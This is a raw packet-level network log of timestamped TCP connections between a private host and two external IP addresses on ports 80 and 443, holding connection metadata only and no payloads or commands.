Sep 4, 2024 17:37:10.063512087 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.063539028 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.063713074 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.063725948 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.063738108 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.063749075 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.063751936 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.063785076 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.063796997 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.063817024 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.063827991 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.063838959 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.063851118 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.063857079 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.063860893 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.063879967 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.063903093 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.063956976 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.063973904 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.063990116 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.063994884 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.064002991 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.064014912 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.064018965 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.064027071 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.064028025 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.064042091 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.064050913 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.064054966 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.064069033 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.064075947 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.064086914 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.064089060 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.064114094 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.064130068 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.064301014 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.064312935 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.064323902 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.064333916 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.064338923 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.064346075 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.064357042 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.064362049 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.064368010 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.064378977 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.064387083 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.064389944 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.064400911 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.064404964 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.064414024 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.064418077 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.064429998 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.064445972 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.064465046 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.064515114 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.064526081 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.064627886 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.064671040 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.064682961 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.064692974 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.064704895 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.064716101 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.064722061 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.064728975 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.064739943 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.064743996 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.064752102 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.064764023 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.064770937 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.064774990 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.064783096 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.064789057 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.064800978 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.064802885 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.064811945 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.064826012 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.064853907 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.065058947 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.065078974 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.065092087 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.065100908 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.065103054 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.065110922 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.065116882 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.065128088 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.065130949 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.065140009 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.065155983 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.065176964 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.072516918 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.072535038 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.072572947 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.072586060 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.072597980 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.072624922 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.072953939 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.072968960 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.073007107 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.073018074 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.073028088 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.073050976 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.073302984 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.073323011 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.073409081 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.073415995 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.073458910 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.074738979 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.074754000 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.074793100 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.074799061 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.074825048 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.074839115 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.075279951 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.075294971 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.075321913 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.075330019 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.075345993 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.075365067 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.076457977 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.076473951 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.076508999 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.076514959 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.076524973 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.076549053 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.077313900 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.077328920 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.077379942 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.077385902 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.077425957 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.077766895 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.077781916 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.077815056 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.077821016 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.077842951 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.077856064 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.140779018 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.140789986 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.140799999 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.140818119 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.140820980 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.140830994 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.140837908 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.140867949 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.141004086 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.141016960 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.141031027 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.141041040 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.141042948 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.141052961 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.141067028 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.141076088 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.141087055 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.141091108 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.141098022 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.141104937 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.141129971 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.141191006 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.141202927 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.141212940 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.141223907 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.141226053 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.141252995 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.141269922 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.141300917 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.141311884 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.141323090 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.141333103 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.141334057 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.141341925 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.141345024 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.141356945 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.141375065 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.141386032 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.148063898 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.148109913 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.148119926 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.148137093 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.148147106 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.148159027 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.148159027 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.148169994 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.148176908 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.148184061 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.148188114 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.148216963 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.148286104 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.148322105 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.148749113 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.148761034 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.148770094 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.148792982 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.148813009 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.148844004 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.148854971 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.148864031 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.148876905 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.148884058 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.148912907 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.148982048 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.148993015 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.149002075 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.149029016 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.149035931 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.149044991 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.149055958 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.149068117 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.149079084 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.149079084 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.149091959 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.149094105 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.149106026 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.149130106 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.149166107 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.149177074 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.149187088 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.149195910 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.149204969 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.149209023 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.149221897 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.149230957 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.149240971 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.149262905 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.149277925 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.149290085 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.149321079 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.149338961 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.149352074 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.149362087 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.149372101 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.149374962 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.149398088 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.149420977 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.149539948 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.149550915 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.149560928 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.149580002 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.149585962 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.149590015 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.149622917 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.149764061 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.149775028 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.149785042 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.149796009 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.149805069 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.149811983 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.149816990 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.149830103 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.149833918 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.149840117 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.149854898 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.149864912 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.149889946 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.149966002 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.149976015 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.149986029 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.150001049 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.150007010 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.150024891 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.150027037 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.150036097 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.150039911 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.150049925 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.150063992 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.150073051 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.150088072 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.152270079 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.152282000 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.152292013 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.152317047 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.152333021 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.152347088 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.152359009 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.152368069 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.152384043 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.152403116 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.152621031 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.152637005 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.152647972 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.152662039 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.152686119 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.152721882 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.152733088 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.152743101 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.152753115 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.152765036 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.152776957 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.152791023 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.152801991 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.152802944 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.152827024 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.152837038 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.152879953 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.152890921 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.152899981 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.152925014 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.152946949 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.153006077 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.153017044 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.153027058 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.153038979 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.153048038 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.153049946 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.153062105 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.153069973 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.153079033 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.153083086 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.153109074 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.153119087 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.153192043 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.153206110 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.153217077 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.153228045 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.153237104 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.153238058 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.153244972 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.153274059 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.153311014 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.153321981 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.153348923 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.153372049 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.153422117 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.153433084 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.153441906 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.153455973 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.153466940 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.153466940 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.153477907 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.153484106 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.153490067 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.153501987 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.153502941 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.153528929 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.153543949 CEST	49717	80	192.168.2.6	147.45.44.104
